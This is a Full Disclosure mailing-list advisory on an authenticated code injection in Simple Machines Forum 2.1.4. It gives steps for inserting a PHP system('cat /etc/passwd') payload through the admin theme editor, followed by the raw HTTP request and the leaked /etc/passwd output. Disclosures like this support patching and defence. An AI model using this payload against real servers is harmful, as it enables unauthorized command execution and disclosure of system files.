[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAF2Wu1YzA-Zvp+BbNxyAN=vVQn1TAj0H4eOd_MrVrc-a+h=oyQ@mail.gmail.com>
Date: Sun, 11 Aug 2024 21:13:11 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Authenticated Code Injection - smfv2.1.4
# Exploit Title: Authenticated Code Injection - smfv2.1.4
# Date: 8/2024
# Exploit Author: Andrey Stoykov
# Version: 2.1.4
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.html
Code Injection Authenticated:
Steps to Reproduce:
1. Login as admin
2. Browse to "Current Theme"
3. Click on "Modify Themes" > "SMF Default Theme"
4. Click on Admin.template.php
5. In the first box enter the PHP payload "<?php system('cat /etc/passwd')
?>"
// HTTP POST request showing the code injection payload
POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
[...]
entire_file[]=<?php+system('cat /etc/passwd') ?>[...]
// HTTP response showing /etc/passwd contents
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
[...]
[...]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists